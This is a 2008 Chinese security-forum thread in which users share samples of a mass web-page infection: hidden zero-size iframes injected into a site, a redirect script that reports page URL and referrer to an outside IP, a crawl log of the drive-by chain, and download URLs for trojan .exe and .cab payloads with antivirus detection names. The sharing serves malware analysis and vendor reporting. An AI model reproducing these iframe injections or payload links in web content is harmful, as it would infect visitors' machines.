循环挂马,暂时没找到能查出来的杀毒软件

显示全部楼层 · 发表于 2008-6-4 10:23:21

从这个地址抓到的。卡巴会报。但是里面的网马下载后查不出来

<iframe src="http://w.aeaer.com/ae.htm" width=0 height=0></iframe>
<iframe src="http://qi.ccbtv.net/btv.htm" width=0 height=0></iframe>
<iframe src="http://88.881215.com/88.htm" width=0 height=0></iframe>
<iframe src=http://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src="http://w.aeaer.com/i.htm" width=0 height=0></iframe>
<iframe src=http://www.fire321.cn/shan.htm width=100 height=0></iframe>
<iframe src="http://czz.aeaer.com/c.htm" width=0 height=0></iframe>
<iframe src=http://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src="http://88.881215.com/in.htm" width=0 height=0></iframe>
<iframe src=http://www.fire321.cn/shan.htm width=100 height=0></iframe>
<iframe src="http://czz.aeaer.com/c.htm" width=0 height=0></iframe>
<iframe src=http://jjj.hfb86.cn/w6.htm width=100 height=0></iframe>
<iframe src=http://www.fire321.cn/shan.htm width=100 height=0></iframe>
<iframe src="http://qi.ccbtv.net/v.htm" width=0 height=0></iframe>
<iframe src="http://czz.aeaer.com/c.htm" width=0 height=0></iframe>
下载后应该有不少新漏洞。不知道公开了没....
希望会的朋友可以上报到杀毒软件商那去~~

显示全部楼层 · 发表于 2008-6-4 10:24:01

xxxy.czu.cn/jsjggjck/cg/data/tk.htm 是这个地址....上面忘写了...

显示全部楼层 · 发表于 2008-6-4 10:24:55

【老顾客了】

显示全部楼层 · 发表于 2008-6-4 10:55:32

木马名称:Trojan.Win32.Agent.nar

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\K1TOWF83\014[1].EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?
木马名称:Trojan.Win32.Agent.nar

程序:
C:\WINDOWS\NTUSER.COM
是木马程序!
已成功阻止其运行,是否要删除此文件?

点了一个网站微点就报已知了！

显示全部楼层 · 发表于 2008-6-4 10:56:42

其他网站基本就是这2个东西

显示全部楼层 · 发表于 2008-6-4 20:57:56

<html><head><link rel="stylesheet" type="text/css" href="http://61.164.55.62:8080/css.css?aimt=242" /></head>
<script type="text/javascript">
var pp = "242&pre="+(new Date()).getTime();
var s=String(window.location.href);
var host=escape(s.substring(7,s.indexOf('/',7)));
var ref=escape(document.referrer);
s = escape(s);
if (self.location == top.location)
document.location="http://61.164.55.62/dnsA.aspx?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
else
document.location="http://61.164.55.62/dnsB.aspx?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
</script><body></body></html>

没有问题呀。

显示全部楼层 · 发表于 2008-6-4 21:02:22

http://n.gan360.com/ad.cab
http://n.gan360.com/og.exe
http://exe.wokaixin.com/ad.cab
http://exe.wokaixin.com/lz.exe
http://www.live322.cn/4561.swf
http://www.live322.cn/test.exe
....etc 老朋友了

显示全部楼层 · 发表于 2008-6-4 21:03:52

http://xia.iphone001.com/down/abd.cab
http://xia.iphone001.com/down/rl.exe
ok

显示全部楼层 · 发表于 2008-6-4 21:03:59

Log is generated by FreShow.
[wide]http://w.aeaer.com/ae.htm
[frame]http://jjj.hfb86.cn/w6.htm
      [frame]http://ccc.bfd67.cn/web/bd.htm
         [object]http://n.gan360.com/ad.cab
         [script]http://ccc.bfd67.cn/web/014.js
            [object]http://n.gan360.com/0014.exe
         [frame]http://ccc.bfd67.cn/web/og.htm
         [script]http://ccc.bfd67.cn/web/rl.js
         [frame]http://ccc.bfd67.cn/web/Rl2.htm
         [script]http://ccc.bfd67.cn/web/bf.js
      [script]http://ww4.tongji123.com/t1.aspx?id=44206085
         [frame]http://ww4.tongji123.com/s.aspx?i='+cqd+yj+'
      [script]http://s90.cnzz.com/stat.php?id=880299&web_id=880299
      [script]http://js.users.51.la/1876325.js
[frame]http://w.aeaer.com/i.htm
      [frame]http://www.jjkkuui.cn/web/6619038.htm
         [frame]http://www.jjkkuui.cn/web/htm.html
            [object]http://exe.wokaixin.com/ad.cab
            [script]http://www.jjkkuui.cn/web/014.js
            [frame]http://www.jjkkuui.cn/web/og.htm
            [script]http://www.jjkkuui.cn/web/rl.js
            [frame]http://www.jjkkuui.cn/web/Rl2.htm
            [script]http://www.jjkkuui.cn/web/bf.js
         [script]http://js.users.51.la/1153797.js
         [script]http://ww4.tongji123.com/g3.aspx?id=40499922
         [script]http://count19.51yes.com/click.aspx?id=193979895&logo=1
[frame]http://www.fire321.cn/shan.htm
      [object]http://www.live322.cn/4562.swf
      [object]http://www.live322.cn/4561.swf
[frame]http://czz.aeaer.com/c.htm
      [frame]http://iphone004.com/one/huai5.htm
         [frame]http://iphone004.com/wmwm/index.htm
            [object]http://xia.iphone001.com/down/abd.cab
            [script]http://iphone004.com/wmwm/014.js
            [script]http://iphone004.com/wmwm/rl.js
            [frame]http://iphone004.com/wmwm/lz.htm
         [script]http://js.users.51.la/1897033.js

显示全部楼层 · 发表于 2008-6-4 21:12:11

avast (VPS 0531-1) : 2

rl.exe\[Upack]\[Embedded#03008]\[Embedded#9008]
Win32:Downloader-BBQ [Trj]

test.exe\[Upack]
Win32:GaoBot-2437 [Trj]

[病毒样本] 循环挂马,暂时没找到能查出来的杀毒软件

评分

http://xxxy.czu.cn/jsjggjck/cg/data/tk.htm

一些老顾客，未解完！